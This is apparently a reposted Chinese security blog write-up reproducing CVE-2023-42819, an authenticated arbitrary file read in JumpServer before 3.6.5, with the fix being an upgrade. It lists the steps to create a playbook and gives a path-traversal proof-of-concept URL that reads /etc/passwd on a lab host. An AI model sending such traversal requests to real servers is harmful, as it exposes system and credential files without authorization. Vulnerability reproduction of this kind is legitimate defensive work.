JumpServer 任意文件读取漏洞(CVE-2023-42819)

admin 2024年4月24日06:10:34评论18 views字数 463阅读1分32秒阅读模式

0X01 简介

JumpServer 是广受欢迎的开源堡垒机,是符合 4A 规范的专业运维安全审计系统。JumpServer 帮助企业以更安全的方式管控和登录所有类型的资产,实现事前授权、事中监察、事后审计,满足等保合规要求。

官网:
https://www.jumpserver.org/
漏洞编号:
CVE-2023-42819
漏洞编号:
JumpServer < 3.6.5
复现环境:
JumpServer 3.6.4
0X02 漏洞复现

漏洞利用需要登录。

切换工作台>作业中心>模板管理>Playbook管理
JumpServer 任意文件读取漏洞(CVE-2023-42819)
创建
JumpServer 任意文件读取漏洞(CVE-2023-42819)
获取ID值
JumpServer 任意文件读取漏洞(CVE-2023-42819)
POC:
http://192.168.245.135/api/v1/ops/playbook/4d98a970-ebc1-40d8-b742-82ccb152bb2a/file/?key=../../../../../../../etc/passwd
JumpServer 任意文件读取漏洞(CVE-2023-42819)
未登录:
JumpServer 任意文件读取漏洞(CVE-2023-42819)
ID值不正确:
JumpServer 任意文件读取漏洞(CVE-2023-42819)

0X03 修复建议

更新至最新版!

0X04

原文始发于微信公众号(皓月的笔记本):【漏洞复现】JumpServer 任意文件读取漏洞(CVE-2023-42819)

 

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月24日06:10:34
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   JumpServer 任意文件读取漏洞(CVE-2023-42819)https://cn-sec.com/archives/2084121.html

发表评论

匿名网友 填写信息